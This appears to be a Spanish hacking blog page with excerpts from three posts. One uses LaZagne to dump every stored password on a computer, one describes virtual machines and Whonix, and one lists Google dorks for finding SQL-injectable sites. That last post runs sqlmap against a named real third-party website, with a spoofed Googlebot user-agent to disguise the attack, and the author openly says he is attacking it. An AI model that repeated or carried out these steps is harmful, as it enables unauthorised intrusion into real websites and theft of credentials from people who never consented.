Descarga: https://github.com/AlessandroZ/LaZagne/r...indows.zip Una vez descomprimido, abrimos la consola y nos vamos a la ruta donde se encuentra el binario. He ingresamos el comando Código: LaZagne.exe -h Para conseguir todas las contraseñas almacenadas en el ordenador solo escribimos el comando: Código: LaZagne.exe all Y si tienes suerte, te lanzara un listado de las contraseñas encontradas. Sitios del proyecto Oficial: github.com https://github.com/AlessandroZ/LaZagne
Entradas
Mostrando entradas de octubre 3, 2017
- Obtener enlace
- X
- Correo electrónico
- Otras aplicaciones
De
Gerson Madrigal
-
Máquina Virtual: En informática una máquina virtual es un software que simula a una computadora y puede ejecutar programas como si fuese una computadora real. Este software en un principio fue definido como "un duplicado eficiente y aislado de una máquina física". La acepción del término actualmente incluye a máquinas virtuales que no tienen ninguna equivalencia directa con ningún hardware real. Fuente: https://es.wikipedia.org/wiki/M%C3%A1quina_virtual Whonix: Es una distribución basada en Debian GNU/Linux enfocada a la seguridad. Busca proporcionar intimidad , seguridad y anonimato en el internet. El sistema operativo consta de dos máquinas virtuales , un "Workstation"o estación de trabajo y un "Gateway" o pasarela a la red Tor , corriendo Debian GNU/Linux. Todas las comunicaciones están forzadas a pasar bajo la red Tor. Fuente: https://es.wikipedia.org/wiki/Whonix Bueno, al fin y al cabo ustedes todos uno
- Obtener enlace
- X
- Correo electrónico
- Otras aplicaciones
De
Gerson Madrigal
-
Código: inurl:item_id= inurl:review.php?id= inurl:hosting_info.php?id= inurl:newsid= inurl:iniziativa.php?in= inurl:gallery.php?id= Luego de ésto, vamos ahora sí a utilizar sqlmap, también puede ser utilizada en windows, sólo se necesita tener Python instalado, pero en mi caso utilizaré Parrot. Página oficial de sqlmap: http://sqlmap.org/ Una vez comprobado que la página es vulnerable, nos dirigimos a una consola y con el enlace de la página copiado hacemos lo siguiente: sqlmap -u http://www.icdcprague.org/index.php?id=10%27 --dbs --user-agent="Mozilla 5 (compatible , Googlebot/2.1, http://www.google.com/bot.html )" En mi caso estoy atacando una web de cuba bastante fácil, por lo que será rápido y sin ningún problema el ataque. -u Con esto especificamos el url a atacar. --dbs Con esto sacamos solamente la base de datos --user-agent Nos sirve para "camuflar" el ataque, es bastante recomendable utilizarlo ya que al atacar una página